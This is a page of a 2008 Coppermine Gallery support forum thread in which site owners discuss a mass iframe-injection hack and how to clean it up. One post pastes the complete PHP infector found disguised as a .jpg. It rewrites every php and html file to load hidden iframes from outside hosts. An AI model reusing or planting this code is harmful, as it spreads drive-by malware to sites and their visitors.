Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 11 Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 11
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

Started by htgguy, April 06, 2008, 10:04:11 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

snappop

Is update.php needed for any purpose except for running once after an upgrade? 

If not it would seem logical to delete after running once after upgrade as it seemed to play a role in attack.

Thoughts?

molkoaddict

I hope this is the right place to post the question. I have ran the update and the Trojan seems to be removed, but my thumbnails are still messed up. I checked my configuration and the settings are right. What is the problem, then? Thanks!

mr.goose

QuoteI hope this is the right place to post the question. I have ran the update and the Trojan seems to be removed, but my thumbnails are still messed up. I checked my configuration and the settings are right. What is the problem, then? Thanks!
If you look carefully you'll almost certainly find that the hacker has changed your config settings. Log in and change them back to however you want them. Look particularly at the Album List View and Thumbnail View areas. Also if you are using a template with the filmstrip enabled then you will need to adjust that from the Image View section.

Best wishes, G

mr.goose

Quote from: snappop on April 16, 2008, 02:04:47 AM
Is update.php needed for any purpose except for running once after an upgrade? 

If not it would seem logical to delete after running once after upgrade as it seemed to play a role in attack.

Thoughts?

I deleted mine. You get a new one when you upgrade. Also according to Nibbler in an earlier post, the update.php included in version 1.5 will be admin only anyway.
Best wishes, G.

IvDogg

Hi everyone, I'm no super expert, so please don't jump on me if I do happen to be wrong.  I also did read more than half the entire thread so give me credit for that in case I say something that has already been said.

A lot of you are way off on how this happened, and how to prevent it from happening.

I have some sites that were affected by this that don't even run php, let alone Coppermine.

One site that was affected runs with jus html and flash.

So upgrading your coppermine, deleting certain file, making sure your permissions are correct, won't help you from it happening again.  Because none of that, that was suggested applies to most of my sites, I have only a few that run CPG.

Now this is where I could be wrong (this is just my educated opinion), the problem is with the host, possibly just shared hosts (has anyone on a server that they physically maintain been hit?  Mine haven't).  Possibly only linux or apache hosts as well, has anyone been hit running windows and/or IIS?  Mine wasn't.  Last a hole in cpanel or other similar shared server apps?  The reason I say this is, every single php, html, htm file on my shared hosts were hit, a lot of them had the correct permissions via individual file/directory permissions or with .htaccess blanket permissions, therefore it would not be possible for a single file or script to cause all that damage.

So to fix it, best bet is to restore your site, your database should be fine.  If you don't have a backup, download your entire site to your computer, get Notepad++, perform 'search & replace' on 'all open files' until the iframe tag has been removed from all your files.  Prevent it from happening, your guess is as good as mine, change your cpanel and ftp passwords, get on your host maybe.  Since a good administrator always has fault tolerance and disaster recovery in mind..  If you can't prevent it make sure your ready to recover, keep backing up, and be ready to restore until this has been fixed.

IvDogg

Quote from: foulu on April 15, 2008, 07:27:27 AM
Hi,

I make a php file that can sanitize the addition data from php & html file that infected with iframe things. I create it to use on one of my working site but I think release it will help more people. The script is simple, just check current folder and all sub folder for .php & .html, loop to find infect string in those files and then remove it. Anyway, use it with own will, I will not take any responsibility if you damage your site when using it.

I attach the file with this post, download and rename it to cure.php, upload to your site & run it.

Is the file you have posted incomplete?  It doesn't close out the last function command on line 76?

molkoaddict

Quote from: mr.goose on April 16, 2008, 02:36:32 AM
If you look carefully you'll almost certainly find that the hacker has changed your config settings. Log in and change them back to however you want them. Look particularly at the Album List View and Thumbnail View areas. Also if you are using a template with the filmstrip enabled then you will need to adjust that from the Image View section.

Best wishes, G
Thanks, I've fixed it. Now I'm having problems with creating intermediate new photos when I upload. They aren't showing up. The old photos are, however. I have yes checked in the configuration. What's the problem? Again, sorry if this is the wrong place to post...

foulu

Please download & have a change to look at cure.txt file & you will find that perfect fine. Also it have 80 lines in this file.

Quote from: IvDogg on April 16, 2008, 03:08:50 AM
Is the file you have posted incomplete?  It doesn't close out the last function command on line 76?

Joachim Müller

Quote from: molkoaddict on April 16, 2008, 04:00:45 AM
Again, sorry if this is the wrong place to post...
It is the wrong place.

Quote from: IvDogg on April 16, 2008, 03:02:02 AM
I have some sites that were affected by this that don't even run php, let alone Coppermine.
That sounds hard to believe. You might suffer from a traversal attack - make sure that the HTML-only sites are shielded properly against the other sites (domains) that are hosted on the same server.

Quote from: IvDogg on April 16, 2008, 03:02:02 AMSo to fix it, best bet is to restore your site, your database should be fine.  If you don't have a backup, download your entire site to your computer, get Notepad++, perform 'search & replace' on 'all open files' until the iframe tag has been removed from all your files.
Hm, that sounds pretty time-consuming. To replace identical elements in multiple files, use the freeware Replace in Files

Quote from: mr.goose on April 16, 2008, 02:40:28 AM
I deleted mine. You get a new one when you upgrade. Also according to Nibbler in an earlier post, the update.php included in version 1.5 will be admin only anyway.
You're safe to delete update.php if you don't need it. As suggested ealier, the file could have been used to determine the table prefix that was needed for the attacker to perform the attack. That's why the file will be admin-only in cpg1.5.x. However, don't expect cpg1.5.x that soon, so you should take care of cpg1.4.x first.

j_taubman

It is perfectly possible for the php compromise in Coppermine to affect all sites in a shared hosting account,  for example the way hostgator is set up by default the injected script can write to all the files in public_html regardless of the domain they belong to if the other domains are in the same public_html folder, as I know to my cost.  I am currently waiting for HG to suggest a solution/lockdown,   but I am not holding my breath.

Jane ( creeping away in case she gets in trouble)


NoviceScotty

Hi everyone -

in case it helps anyone, what I did was download all my files to a working directory (using FileZilla).
Luckily I don't have all that many files. I then used UltraEdit to do a <find in files> on the local copy for the hack string iframe or &#.
I found one jpg extension file with the php code. I then looked on the server for the file and made a note of the date it was created.

I then looked through all the server directory with FileZilla  to identify all the files that had been changed on or after that date.
As I had locked the site down the day after the attack, there were no valid files changed, so I could see what had been infected.
(I Haven't actually upgraded yet - my site is still down , so I can't swear I got everything, but it seems that the attack took place on one specific time.)


Secondly, one of my computers got a trojan/virus from the redirect site, which was very difficult to get rid of.
It was an old computer using internet explorer, although it did have windows automatic updates activated.
(My main computer running Opera wasn't affected.)

ZoneAlarm found and quarantined lots of nasties, but when I rebooted, I still had copies of iexplore.exe being run in the background, and lots of svchost.exe being run, (Visible in the Task Manager) slowing down internet access and  eventually causing errors and forcing a reboot.

I tried running various other tools (Spy Bot, AdAware) and used the Windows repair disk, but to no avail - still iexplore.exe starting in background

I then ran Hijack This, and removed everything that I didn't recognise. I also removed all files from the windows program files directory I didn't recognise. It seems that I don't recognise Windows system files, because the computer wouldn't reboot, and so I had to do a new install.
Followed by reinstall and update Zone Alarm. Followed by install Service Pack 2, which Zone Alarm seemed to think was a virus and so I had to disable Zone Alrm during SP2 install.  Followed by Windows Updater. And so on - you get the picture.
Since then the system seems to be clean - at least no more iexplore starting.

So, if you have been redirected to the hacking site with IE, I suggest you check that you don't have any unwanted iexplore.exe running and presumably sending data to some Russina mafia site ...

And if you do find something - take the time to find out which potential threats are part of the Windows OS and which are viruses that need to be removed, otherwise it is a l o n g process to reinstall Windows!

Finally, thanks to everyone who is helping out here - I really appreciate this forum!





capecodgal

Quote from: IvDogg on April 16, 2008, 03:02:02 AM
Now this is where I could be wrong (this is just my educated opinion), the problem is with the host, possibly just shared hosts (has anyone on a server that they physically maintain been hit?  Mine haven't).  Possibly only linux or apache hosts as well, has anyone been hit running windows and/or IIS?  Mine wasn't.  Last a hole in cpanel or other similar shared server apps?  The reason I say this is, every single php, html, htm file on my shared hosts were hit, a lot of them had the correct permissions via individual file/directory permissions or with .htaccess blanket permissions, therefore it would not be possible for a single file or script to cause all that damage.

Thats kind of along the lines of what I am thinking as well - we run CPG on EVERY site we have on various servers. On host (#1) I believe it is Linux/ Apache and shared hosting for sure- it seems it spread through the server to other sites on it (this host just restored us all so I never saw what the actual hack was if it was the same iframe script or not; but I do know my one site there had the config messed w/ in cpg as my thumbs were all out of whack). Then on host (#2) we did not have any attacks - this is a Windows server which is hosting via IIS and everything is fine and dandy - then on host (#3) we got hit bad.... this was a paid acct w/ alot of storage so we had started about 10 sites running on the shared hosting on that acocunt- each and every sub domain was hit w/ the attack; it looks like it got into one and then spread to all the others... now on this particular attack my co-web noticed they got into our cpanel and messed that all up too. Its hard to say as I know the permissions were not right on that server (I know I had alot of things set w/ access that didn't need it which was my own fault) but I really think you are onto something that this may not have been an attack on cpg but rather on the OS or the cpanel level instead.

Either way I know I am pushing it as this is not the place for that discussion but I really am starting to believe it isn't just a CPG issue; its just seemed to be what all the sites had in common until I started noticing the OS being a probability as well. I think alot of people just assumed it was cpg that had the hole as that was where it all seemed to start up.

Either way kudos to Gau Gau, Nibbler and the rest of the cpg crew for all their hard work on trying keep the peace and putting up with our panic for the past few weeks.


Nibbler

The hole we fixed is one we know was used to infect a gallery with this malware. It's likely other apps can be exploited in different ways to inject the same malware.

philippe1

Hi from France,
I got hacked on all my web sites. Php files had been replaced and I wonder how hackers got my ftp passwords ...
I'm using spip, dotclear ang CPG.
This is the way I solved the problem.
As only php files were corrupted, I changed the properties of folders and files to : read, execute BUT NOT WRITE. for all php files.
For CPG, the custom header file is the favorite target for hackers.
For Dotclear it's the template.php file.
I would be interested to know how somebody can override the ftp passwords.

The best way to keep a web site clean is to keep an local image of the whole site to be abble to replace all the corrupted files easilly.

I changed the attributes of a folder to allow writing and it took only 50 minutes for a hacker to corrupt my template.php files.

Philippe



Nookster

Quote from: Moke on April 07, 2008, 05:34:36 AM
Htgguy,

My sites have been hacked too with the same code and I am working my way trying go recover them, but a few things that might help others who find this posts as it comes up first in Goolge.

1. The hack is not specific to Coppermine, it simply updates every .php and .html file with its iframe code.

     The hack IS specific to Coppermine in that php script that was executed that added the iframe() tag to your web pages at least in my site was uploaded
through Coppermine.  That's not to say there aren't other PHP applications out there with similar vulnerabilities, but this particular exploit exploited Coppermine.

MyWebsiteAdviser

Hi,

My website has been hacked too. The hacker uploaded somehow "45563131x.jpg" file (this is a php file, not an image!) to the "~/coppermine/albums/userpics/10001" folder.

I am using coppermine 1.4.10, Linux shared web hosting at GoDaddy, MySQL 4.1, PHP  4.3.11. I don't have access to my logs  >:(

Follow 45563131x.jpg content file:
Quote
<?php
//sorry
if (!defined("XSssUI")) {

define("XSssUI", true);
echo "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";

function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];
   
   return $filetype;
}

function parse($path, $pathx) {
   $pg = "<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>";
   $xm = "<?php echo '<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>'; ?>";
   $gg = "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";
   $nm = '<?php
   include("'.$pathx.'");
   ?>';
   $fm = '<?php
   ini_set("register_globals", true);
   if($GLOBALS["fx"]==0) {
   $GLOBALS["fx"]=1;
   echo "'.$gg.'";
   }
   ?>';
   
   $dir_array = array();
   if($handle = opendir($path)) {
      while (false !== ($file = readdir($handle))) {
         if($file != "." && $file != "..") {
            $try_dir = $path.$file.'/';
            if(is_dir($try_dir)) {
               array_push($dir_array, $try_dir);
            }
            else {
               if ($path[strlen($path)-1] != '/') {
                  $path.= '/';
               }
               $f_ext = fileExtension($file);
               if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
                  if($file!="debugger.inc.php") {
                     $fhandle = fopen($path.$file, 'r+');
                     if($f_ext=="php") {
                        chmod($path.$file,0777);
                        $oc = fread($fhandle, filesize($path.$file));
                        fclose($fhandle);
                        $oc = str_replace($xm, '', $oc);
                        $oc = str_replace($fm , '', $oc);
                        $oc = str_replace($nm , '', $oc);
                        $fhandle2 = fopen($path.$file, 'w+');
                        fwrite($fhandle2, $oc.$nm);
                        fclose($fhandle2);
                     }
                     else {
                        chmod($path.$file,0777);
                        $oc = fread($fhandle, filesize($path.$file));
                        fclose($fhandle);
                        $oc = str_replace($pg, '', $oc);
                        $oc = str_replace($gg, '', $oc);
                        $fhandle2 = fopen($path.$file, 'w+');
                        fwrite($fhandle2, $oc.$gg);
                        fclose($fhandle2);
                     }
                  }
               }
            }
         }
      }
      closedir($handle);
   }
      
   return $dir_array;
}



function launch($pathx) {
   $total = 0;
   $last = 1;
   $last_num = 0;
   $path = $_SERVER['DOCUMENT_ROOT'];
   $dirs = array();
   array_push($dirs, $path);

   while($last) {
      $last_num = 0;
      for( $j=$total; $j<$total+$last; $j++) {
         $temp_dirs = parse($dirs[$j], getcwd().'/'.$pathx);
         $last_t = sizeof($temp_dirs);
         $last_num += $last_t;
         for( $i=0; $i<$last_t; $i++) {
            array_push($dirs, $temp_dirs[$i]);
         }
      }
      $total += $last;
      $last = $last_num;      
   }

   $paths = getcwd().'/albums/userpics/10001/123213x';

   if(!is_file($paths.'.jpg')) {
      if(copy($paths.'.zip', $paths.'.jpg')) {
         echo "@#$%";
      }
   }
}

if(isset($_GET['ff']) && isset($_GET['path'])) {
   echo "~!";
   launch($_GET['path']);
}

}   

?>
Alex Webs,
MyWebsiteAdviser.com

François Keller

update to the 1.4.18 version (your running 1.4.10) and clean up your files (read this post http://forum.coppermine-gallery.net/index.php/topic,51927.msg251808.html#msg251808)
next time, search the board  ;)
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

MyWebsiteAdviser

Alex Webs,
MyWebsiteAdviser.com

zac

Sorry but have to say me too.    I had a test version of coppermine that I spaced out on ever updating and that is where the naughty jpg is hiding.  :-[

This exploit went way outside of my cpg install and changed every single php file (1000s) of my website. 

My post is two fold, one I wanted to thank Gau Gau for your tutorial post and to the others in this thread for your quick response to this and offering up some solutions.

Also I am puzzled by this:

Quote from: Jon F on April 10, 2008, 10:07:49 AM
Some information on the domain itself.

http://whois.domaintools.com/cdpuvbhfzz.com

Interesting whois record.

Is it really that easy to see who created this exploit?  Justice?